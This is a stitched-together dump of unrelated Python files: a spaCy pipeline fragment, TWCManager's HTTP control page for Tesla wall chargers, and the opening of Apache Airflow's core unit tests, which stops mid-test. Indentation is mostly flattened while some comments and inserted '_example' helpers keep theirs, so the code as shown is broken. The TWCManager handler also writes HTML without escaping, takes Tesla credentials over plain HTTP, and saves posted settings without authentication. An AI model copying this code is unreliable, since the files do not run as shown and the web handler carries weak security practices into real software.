proc.cfg.setdefault("deprecation_fixes", {})
proc.cfg["deprecation_fixes"]["vectors_name"] = nlp.vocab.vectors.name
class DisabledPipes(list):
"""Manager for temporary pipeline disabling."""
def __init__(self, nlp, *names):
self.nlp = nlp
self.names = names
        # Important! This is not a deep copy -- we just want a new container,
        # while still supporting arbitrarily typed nlp.pipeline objects.
self.original_pipeline = copy(nlp.pipeline)
list.__init__(self)
self.extend(nlp.remove_pipe(name) for name in names)
def __enter__(self):
return self
def __exit__(self, *args):
self.restore()
def restore(self):
"""Restore the pipeline to its state when DisabledPipes was created."""
current, self.nlp.pipeline = self.nlp.pipeline, self.original_pipeline
unexpected = [name for name, pipe in current if not self.nlp.has_pipe(name)]
if unexpected:
# Don't change the pipeline if we're raising an error.
self.nlp.pipeline = current
raise ValueError(Errors.E008.format(names=unexpected))
self[:] = []
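# DisabledPipes is what `nlp.disable_pipes(...)` returns, so it is normally used
# as a context manager that removes the named components and restores them on
# exit. A hedged usage sketch (assumes the en_core_web_sm model is installed;
# the helper is illustrative only and not part of this module):
def _example_disable_pipes():
    import spacy

    nlp = spacy.load("en_core_web_sm")
    with nlp.disable_pipes("tagger", "parser"):
        doc = nlp("Only the remaining components run here.")
    # Outside the `with` block the tagger and parser are back in nlp.pipeline.
    return doc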
def _pipe(docs, proc, kwargs):
# We added some args for pipe that __call__ doesn't expect.
kwargs = dict(kwargs)
for arg in ["n_threads", "batch_size"]:
if arg in kwargs:
kwargs.pop(arg)
for doc in docs:
doc = proc(doc, **kwargs)
yield doc
def _apply_pipes(make_doc, pipes, receiver, sender):
"""Worker for Language.pipe
receiver (multiprocessing.Connection): Pipe to receive text. Usually
created by `multiprocessing.Pipe()`
sender (multiprocessing.Connection): Pipe to send doc. Usually created by
`multiprocessing.Pipe()`
"""
while True:
        texts = receiver.get()
docs = (make_doc(text) for text in texts)
for pipe in pipes:
docs = pipe(docs)
        # Connection does not accept unpicklable objects, so send a list of byte strings.
sender.send([doc.to_bytes() for doc in docs])
class _Sender:
"""Util for sending data to multiprocessing workers in Language.pipe"""
def __init__(self, data, queues, chunk_size):
self.data = iter(data)
self.queues = iter(cycle(queues))
self.chunk_size = chunk_size
self.count = 0
def send(self):
"""Send chunk_size items from self.data to channels."""
for item, q in itertools.islice(
zip(self.data, cycle(self.queues)), self.chunk_size
):
            # Cycle through the channels so the texts are distributed evenly.
q.put(item)
def step(self):
"""Tell sender that comsumed one item.
Data is sent to the workers after every chunk_size calls."""
self.count += 1
if self.count >= self.chunk_size:
self.count = 0
self.send()
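# `_Sender` plus `_apply_pipes` implement a simple flow-control scheme: texts are
# pushed onto per-worker queues in chunks, workers stream byte-encoded docs back
# over pipes, and the parent refills the queues as batches are consumed. A
# stripped-down sketch of the same pattern with plain strings instead of Doc
# objects (illustrative only; the names below are not part of spaCy's API):
def _example_worker(in_queue, out_conn):
    while True:
        batch = in_queue.get()
        out_conn.send([text.upper() for text in batch])  # stand-in for pipeline work


if __name__ == "__main__":
    import multiprocessing as _mp

    work_q = _mp.Queue()
    recv_end, send_end = _mp.Pipe(False)
    worker = _mp.Process(target=_example_worker, args=(work_q, send_end), daemon=True)
    worker.start()
    work_q.put(["hello", "world"])   # one chunk, like _Sender.send()
    print(recv_end.recv())           # ['HELLO', 'WORLD']
    worker.terminate()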
|
HTTPControl.py
|
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from termcolor import colored
import threading
import time
import urllib.parse
from ww import f
class ThreadingSimpleServer(ThreadingMixIn, HTTPServer):
pass
class HTTPControl:
configConfig = {}
configHTTP = {}
debugLevel = 1
httpPort = 8080
master = None
status = False
def __init__(self, master):
self.master = master
try:
self.configConfig = master.config["config"]
except KeyError:
self.configConfig = {}
try:
self.configHTTP = master.config["control"]["HTTP"]
except KeyError:
self.configHTTP = {}
self.debugLevel = self.configConfig.get("debugLevel", 1)
self.httpPort = self.configHTTP.get("listenPort", 8080)
self.status = self.configHTTP.get("enabled", False)
if self.status:
httpd = ThreadingSimpleServer(("", self.httpPort), HTTPControlHandler)
httpd.master = master
self.master.debugLog(
1, "HTTPCtrl ", "Serving at port: " + str(self.httpPort)
)
threading.Thread(target=httpd.serve_forever, daemon=True).start()
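# HTTPControl wires a ThreadingMixIn HTTP server to a request handler class and
# runs serve_forever() in a daemon thread so the web UI never blocks the main
# control loop. A minimal standalone sketch of that pattern (the handler and
# port below are illustrative, not TWCManager's real configuration):
def _example_threaded_http_server(port=8099):
    class _EchoHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.send_response(200)
            self.send_header("Content-type", "text/plain")
            self.end_headers()
            self.wfile.write(("You requested " + self.path).encode("utf-8"))

    httpd = ThreadingSimpleServer(("", port), _EchoHandler)
    threading.Thread(target=httpd.serve_forever, daemon=True).start()
    return httpd  # caller can later call httpd.shutdown()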
class HTTPControlHandler(BaseHTTPRequestHandler):
fields = {}
def do_css(self):
page = "<style>"
page += """
table.darkTable {
font-family: 'Arial Black', Gadget, sans-serif;
border: 2px solid #000000;
background-color: #717171;
width: 60%;
height: 200px;
text-align: center;
border-collapse: collapse;
}
table.darkTable td, table.darkTable th {
border: 1px solid #4A4A4A;
padding: 3px 2px;
}
table.darkTable tbody td {
font-size: 13px;
color: #E6E6E6;
}
table.darkTable tr:nth-child(even) {
background: #888888;
}
table.darkTable thead {
background: #000000;
border-bottom: 3px solid #000000;
}
table.darkTable thead th {
font-size: 15px;
font-weight: bold;
color: #E6E6E6;
text-align: center;
border-left: 2px solid #4A4A4A;
}
table.darkTable thead th:first-child {
border-left: none;
}
table.darkTable tfoot td {
font-size: 12px;
}
#vertical thead,#vertical tbody{
display:inline-block;
}
table.borderless {
font-family: 'Arial Black', Gadget, sans-serif;
border: 0px;
width: 40%;
height: 200px;
text-align: center;
border-collapse: collapse;
}
table.borderless th {
font-size: 15px;
font-weight: bold;
color: #FFFFFF;
background: #212529;
text-align: center;
}
"""
page += "</style>"
return page
def do_chargeSchedule(self):
page = """
<table class='borderless'>
<thead>
<th scope='col'> </th>
<th scope='col'>Sun</th>
<th scope='col'>Mon</th>
<th scope='col'>Tue</th>
<th scope='col'>Wed</th>
<th scope='col'>Thu</th>
<th scope='col'>Fri</th>
<th scope='col'>Sat</th>
</thead>
<tbody>"""
for i in (x for y in (range(6, 24), range(0, 6)) for x in y):
page += "<tr><th scope='row'>%02d</th>" % (i)
            for day in range(0, 7):  # one cell per weekday column (Sun-Sat)
page += "<td> </td>"
page += "</tr>"
page += "</tbody>"
page += "</table>"
return page
def do_jsrefresh(self):
page = """
    <script language = 'JavaScript'>
    // Only refresh the main page if the browser window has focus, and if
    // the input form does not have focus
var formFocus = false;
var hasFocus= true;
function formNoFocus() {
formFocus = false;
}
function formHasFocus() {
formFocus = true;
}
window.onblur = function() {
hasFocus = false;
}
window.onfocus = function(){
hasFocus = true;
}
setInterval(reload, 5*1000);
function reload(){
if(hasFocus && !formFocus){
location.reload(true);
}
}
</script> """
return page
def do_navbar(self):
page = """
<p> </p>
<p> </p>
<nav class='navbar fixed-top navbar-dark bg-dark' role='navigation'>
<a class='navbar-brand' href='/'>TWCManager</a>
<link rel='icon' type='image/png' href='https://raw.githubusercontent.com/ngardiner/TWCManager/master/tree/v1.1.8/html/favicon.png'>
<ul class="navbar-nav mr-auto">
<li class="nav-item active">
<a class="nav-link" href="#">Home</a>
</li>
</ul>
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="/policy">Policy</a>
</li>
</ul>
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="#">Schedule</a>
</li>
</ul>
<ul class="navbar-nav mr-auto">
<li class="nav-item">
<a class="nav-link" href="/settings">Settings</a>
</li>
</ul>
<ul class='navbar-nav mr-auto'>
<li class='nav-item'>
<a class='nav-link' href='https://github.com/ngardiner/TWCManager'>GitHub</a>
</li>
</ul>
<span class="navbar-text">v1.1.8</span>
</nav>"""
return page
def do_get_policy(self):
page = """
<html>
<head><title>Policy</title></head>
<body>
<table>
<tr><td>Emergency</td></tr>
"""
for policy in self.server.master.getModuleByName("Policy").charge_policy:
page += "<tr><td>" + policy['name'] + "</td></tr>"
for i in range(0, len(policy['match'])):
page += "<tr><td> </td>"
page += "<td>" + policy['match'][i] + "</td>"
page += "<td>" + policy['condition'][i] + "</td>"
page += "<td>" + str(policy['value'][i]) + "</td></tr>"
page += """
</table>
</body>
"""
return page
def do_get_settings(self):
page = """
<html>
<head><title>Settings</title></head>
<body>
<form method=POST action='/settings/save'>
<table>
<tr>
<th>Stop Charging Method</th>
<td>
<select name='chargeStopMode'>"""
page += '<option value="1" '
if self.server.master.settings.get("chargeStopMode", "1") == "1":
page += "selected"
page += ">Tesla API</option>"
page += '<option value="2" '
if self.server.master.settings.get("chargeStopMode", "1") == "2":
page += "selected"
page += ">Stop Responding to Slaves</option>"
page += """
</select>
</td>
</tr>
<tr>
<td> </td>
<td><input type=submit /></td>
</tr>
</table>
</form>
</body>
</html>
"""
return page
def do_GET(self):
url = urllib.parse.urlparse(self.path)
if (
url.path == "/"
or url.path == "/apiacct/True"
or url.path == "/apiacct/False"
):
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
# Send the html message
page = "<html><head>"
page += "<title>TWCManager</title>"
page += (
"<meta name='viewport' content='width=device-width, initial-scale=1'>"
)
page += "<link rel='stylesheet' href='https://stackpath.bootstrapcdn.com/bootstrap/4.3.1/css/bootstrap.min.css' integrity='sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T' crossorigin='anonymous'>"
page += self.do_css()
page += self.do_jsrefresh()
page += "</head>"
page += "<body>"
page += self.do_navbar()
page += "<table border='0' padding='0' margin='0' width='100%'><tr>"
page += "<td valign='top'>"
if url.path == "/apiacct/False":
page += "<font color='red'><b>Failed to log in to Tesla Account. Please check username and password and try again.</b></font>"
if not self.server.master.teslaLoginAskLater and url.path != "/apiacct/True":
# Check if we have already stored the Tesla credentials
# If we can access the Tesla API okay, don't prompt
                if not self.server.master.getModuleByName("TeslaAPI").car_api_available():
page += self.request_teslalogin()
if url.path == "/apiacct/True":
page += "<b>Thank you, successfully fetched Tesla API token."
page += self.show_status()
page += "</table>"
page += "</body>"
page += "</table>"
page += "</html>"
self.wfile.write(page.encode("utf-8"))
return
if url.path == "/policy":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
page = self.do_get_policy()
self.wfile.write(page.encode("utf-8"))
return
if url.path == "/settings":
self.send_response(200)
self.send_header("Content-type", "text/html")
self.end_headers()
page = self.do_get_settings()
self.wfile.write(page.encode("utf-8"))
return
if url.path == "/tesla-login":
# For security, these details should be submitted via a POST request
# Send a 405 Method Not Allowed in response.
            self.send_response(405)
            self.end_headers()
page = "This function may only be requested via the POST HTTP method."
self.wfile.write(page.encode("utf-8"))
return
# All other routes missed, return 404
        self.send_response(404)
        self.end_headers()
def do_POST(self):
# Parse URL
url = urllib.parse.urlparse(self.path)
# Parse POST parameters
self.fields.clear()
length = int(self.headers.get("content-length"))
field_data = self.rfile.read(length)
self.fields = urllib.parse.parse_qs(str(field_data))
if url.path == "/settings/save":
# User has submitted settings.
# Call dedicated function
self.process_settings()
return
if url.path == "/tesla-login":
# User has submitted Tesla login.
# Pass it to the dedicated process_teslalogin function
self.process_teslalogin()
return
# All other routes missed, return 404
self.send_response(404)
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_settings(self):
# Write settings
for key in self.fields:
keya = str(key).replace("b'", "")
vala = self.fields[key][0].replace("'", "")
self.server.master.settings[keya] = vala
self.server.master.saveSettings()
# Redirect to the index page
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def process_teslalogin(self):
# Check if we are skipping Tesla Login submission
if not self.server.master.teslaLoginAskLater:
later = False
try:
later = len(self.fields["later"])
except KeyError as e:
later = False
if later:
self.server.master.teslaLoginAskLater = True
if not self.server.master.teslaLoginAskLater:
# Connect to Tesla API
carapi = self.server.master.getModuleByName("TeslaAPI")
carapi.setCarApiLastErrorTime(0)
ret = carapi.car_api_available(
self.fields["email"][0], self.fields["password"][0]
)
# Redirect to an index page with output based on the return state of
# the function
self.send_response(302)
self.send_header("Location", "/apiacct/" + str(ret))
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
else:
# User has asked to skip Tesla Account submission for this session
# Redirect back to /
self.send_response(302)
self.send_header("Location", "/")
self.end_headers()
self.wfile.write("".encode("utf-8"))
return
def request_teslalogin(self):
page = "<form action='/tesla-login' method='POST'>"
page += "<p>Enter your email and password to allow TWCManager to start and "
page += "stop Tesla vehicles you own from charging. These credentials are "
page += "sent once to Tesla and are not stored. Credentials must be entered "
page += "again if no cars are connected to this charger for over 45 days."
page += "</p>"
page += "<input type=hidden name='page' value='tesla-login' />"
page += "<p>"
page += "<table>"
page += "<tr><td>Tesla Account E-Mail:</td>"
page += "<td><input type='text' name='email' value='' onFocus='formHasFocus()' onBlur='formNoFocus()'></td></tr>"
page += "<tr><td>Password:</td>"
page += "<td><input type='password' name='password' onFocus='formHasFocus()' onBlur='formNoFocus()'></td></tr>"
page += "<tr><td><input type='submit' name='submit' value='Log In'></td>"
page += "<td><input type='submit' name='later' value='Ask Me Later'></td>"
page += "</tr>"
page += "</table>"
page += "</p>"
page += "</form>"
return page
def show_status(self):
page = "<table width = '100%'><tr width = '100%'><td width='35%'>"
page += "<table class='table table-dark' width='100%'>"
page += "<tr><th>Amps to share across all TWCs:</th>"
page += "<td>" + str(self.server.master.getMaxAmpsToDivideAmongSlaves()) + "</td>"
page += "<td>amps</td></tr>"
page += "<tr><th>Current Generation</th>"
page += "<td>" + str(self.server.master.getGeneration()) + "</td>"
page += "<td>watts</td>"
genamps = 0
if self.server.master.getGeneration():
genamps = self.server.master.getGeneration() / 240
page += "<td>" + str(genamps) + "</td><td>amps</td></tr>"
page += "<tr><th>Current Consumption</th>"
page += "<td>" + str(self.server.master.getConsumption()) + "</td>"
page += "<td>watts</td>"
conamps = 0
if self.server.master.getConsumption():
conamps = self.server.master.getConsumption() / 240
page += "<td>" + str(conamps) + "</td><td>amps</td></tr>"
page += "<tr><th>Current Charger Load</th>"
page += "<td>" + str(self.server.master.getChargerLoad()) + "</td>"
page += "<td>watts</td>"
page += "</tr>"
page += "<tr><th>Number of Cars Charging</th>"
page += "<td>" + str(self.server.master.num_cars_charging_now()) + "</td>"
page += "<td>cars</td></tr></table></td>"
page += "<td width='30%'>"
page += "<table class='table table-dark' width='100%'>"
page += "<tr><th>Current Policy</th>"
page += "<td>" + str(self.server.master.getModuleByName("Policy").active_policy) + "</td></tr>"
page += "<tr><th>Scheduled Charging Amps</th>"
page += "<td>" + str(self.server.master.getScheduledAmpsMax()) + "</td></tr>"
page += "<tr><th>Scheduled Charging Start Hour</th>"
page += "<td>" + str(self.server.master.getScheduledAmpsStartHour()) + "</td></tr>"
page += "<tr><th>Scheduled Charging End Hour</th>"
page += "<td>" + str(self.server.master.getScheduledAmpsEndHour()) + "</td>"
page += "</tr>"
page += "<tr><th>Is a Green Policy?</th>"
        if self.server.master.getModuleByName("Policy").policyIsGreen():
            page += "<td>Yes</td>"
        else:
            page += "<td>No</td>"
page += "</tr>"
page += "</table></td>"
page += "<td width = '35%' rowspan = '3'>"
page += self.do_chargeSchedule()
page += "</td></tr>"
page += "<tr><td width = '60%' colspan = '4'>"
page += self.show_twcs()
page += "</td></tr>"
# Handle overflow from calendar
page += "<tr><td> </td></tr></table>"
return page
def show_twcs(self):
page = "<table class='darkTable'>\n"
page += "<thead><tr>"
page += "<th>TWC ID</th>"
page += "<th>State</th>"
page += "<th>Version</th>"
page += "<th>Max Amps</th>"
page += "<th>Amps Offered</th>"
page += "<th>Amps In Use</th>"
page += "<th>Last Heartbeat</th>"
page += "</tr></thead>\n"
lastAmpsTotal = 0
maxAmpsTotal = 0
totalAmps = 0
for slaveTWC in self.server.master.getSlaveTWCs():
page += "<tr>"
page += "<td>%02X%02X</td>" % (slaveTWC.TWCID[0], slaveTWC.TWCID[1])
page += "<td>" + str(slaveTWC.reportedState) + "</td>"
page += "<td>" + str(slaveTWC.protocolVersion) + "</td>"
page += "<td>%.2f</td>" % float(slaveTWC.maxAmps)
maxAmpsTotal += float(slaveTWC.maxAmps)
page += "<td>%.2f</td>" % float(slaveTWC.lastAmpsOffered)
lastAmpsTotal += float(slaveTWC.lastAmpsOffered)
page += "<td>%.2f</td>" % float(slaveTWC.reportedAmpsActual)
totalAmps += float(slaveTWC.reportedAmpsActual)
page += "<td>%.2f sec</td>" % float(time.time() - slaveTWC.timeLastRx)
page += "</tr>\n"
page += "<tr><td><b>Total</b><td> </td><td> </td>"
page += "<td>%.2f</td>" % float(maxAmpsTotal)
page += "<td>%.2f</td>" % float(lastAmpsTotal)
page += "<td>%.2f</td>" % float(totalAmps)
page += "</tr></table>\n"
return page
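# do_POST above converts the raw body with str(), which leaves a literal "b'"
# prefix on the first field name and is why process_settings() strips it back
# out. A hedged sketch of the more direct approach, decoding the bytes before
# parsing (illustrative only; this is not how the handler above currently works):
def _example_parse_post_body(raw_body=b"email=user%40example.com&password=secret"):
    fields = urllib.parse.parse_qs(raw_body.decode("utf-8"))
    # -> {'email': ['user@example.com'], 'password': ['secret']}
    return fields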
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from freezegun import freeze_time
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
configuration.conf.load_test_config()
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
import six
NUM_EXAMPLE_DAGS = 19
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(*args, **kwargs):
pass
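# OperatorSubclass exists so the tests can exercise Airflow's templating: any
# attribute listed in `template_fields` is rendered through Jinja2 with the task
# instance's context before execute() runs. A hedged usage sketch (the DAG id
# and task id below are illustrative only and not used by the tests):
def _example_templated_operator():
    example_dag = DAG('template_demo',
                      default_args={'owner': 'airflow', 'start_date': DEFAULT_DATE})
    task = OperatorSubclass(
        task_id='templated_demo_task',
        some_templated_field='run date is {{ ds }}',  # rendered at run time, e.g. '2015-01-01'
        dag=example_dag)
    return task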
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
        Test scheduling a dag where a prior DagRun already exists with the
        same run_id that the next run would have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
Tests scheduling a dag scheduled for @once - should be scheduled the first time
it is called, and not scheduled the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
@freeze_time('2016-01-01')
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
start_date of 2015-01-01, only jobs up to, but not including
2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
start_date = DEFAULT_DATE
runs = 365
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
t = BashOperator(
task_id='test_illegal_args',
bash_command='echo success',
dag=self.dag,
illegal_argument_1234='hello?')
self.assertTrue(
issubclass(w[0].category, PendingDeprecationWarning))
self.assertIn(
'Invalid arguments were passed to BashOperator.',
w[0].message.args[0])
def test_bash_operator(self):
t = BashOperator(
task_id='test_bash_operator',
bash_command="echo success",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_multi_byte_output(self):
t = BashOperator(
task_id='test_multi_byte_bash_operator',
bash_command=u"echo \u2600",
dag=self.dag,
output_encoding='utf-8')
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
def test_bash_operator_kill(self):
import psutil
sleep_time = "100%d" % os.getpid()
t = BashOperator(
task_id='test_bash_operator_kill',
execution_timeout=timedelta(seconds=1),
bash_command="/bin/bash -c 'sleep %s'" % sleep_time,
dag=self.dag)
self.assertRaises(
exceptions.AirflowTaskTimeout,
t.run,
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE)
sleep(2)
pid = -1
for proc in psutil.process_iter():
if proc.cmdline() == ['sleep', sleep_time]:
pid = proc.pid
if pid != -1:
